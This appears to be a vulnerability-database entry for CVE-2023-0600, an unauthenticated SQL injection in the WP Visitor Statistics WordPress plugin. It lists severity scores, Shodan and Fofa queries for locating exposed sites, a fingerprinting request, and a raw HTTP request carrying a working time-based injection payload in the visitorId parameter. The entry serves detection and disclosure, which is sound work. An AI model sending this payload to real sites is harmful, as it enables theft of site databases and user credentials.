| Title | WP Visitor Statistics (Real Time Traffic) < 6.9 - SQL Injection |
|---|---|
| Author | r3Y3r53,j4vaovo |
| Severity | Critical |
| Impact | Unauthenticated attackers can execute time-based SQL injection through the visitorId parameter to extract the complete WordPress database including user credentials and site statistics. |
| Remediation | Fixed in version 6.9 |
| CVSS Score | 9.8 |
| EPSS Score | 0.77404 |
| CVE ID | CVE-2023-0600 |
| CWE ID | CWE-89 |
| Shodan Query | http.html:"wp-stats-manager" |
| Fofa Query | body="wp-stats-manager" |
| Tags | time-based-sqli cve cve2023 wp wp-plugin wordpress wpscan unauth wp-stats-manager sqli plugins-market vkev vuln |
The plugin does not escape user input which is concatenated to an SQL query, allowing unauthenticated visitors to conduct SQL Injection attacks.
GET /wp-content/plugins/wp-statistics/readme.txt HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:65.1) Gecko/20100101 Firefox/65.1
Connection: close
Accept-Encoding: gzip
GET /?wmcAction=wmcTrack&siteId=34&url=test&uid=01&pid=02&visitorId=585890%27,sleep(6),0,0,0,0,0);--+- HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2023/CVE-2023-0600.yaml
🦈 Packet Capture: ⬇️ Download cve-2023-0600.pcap
N/AN/A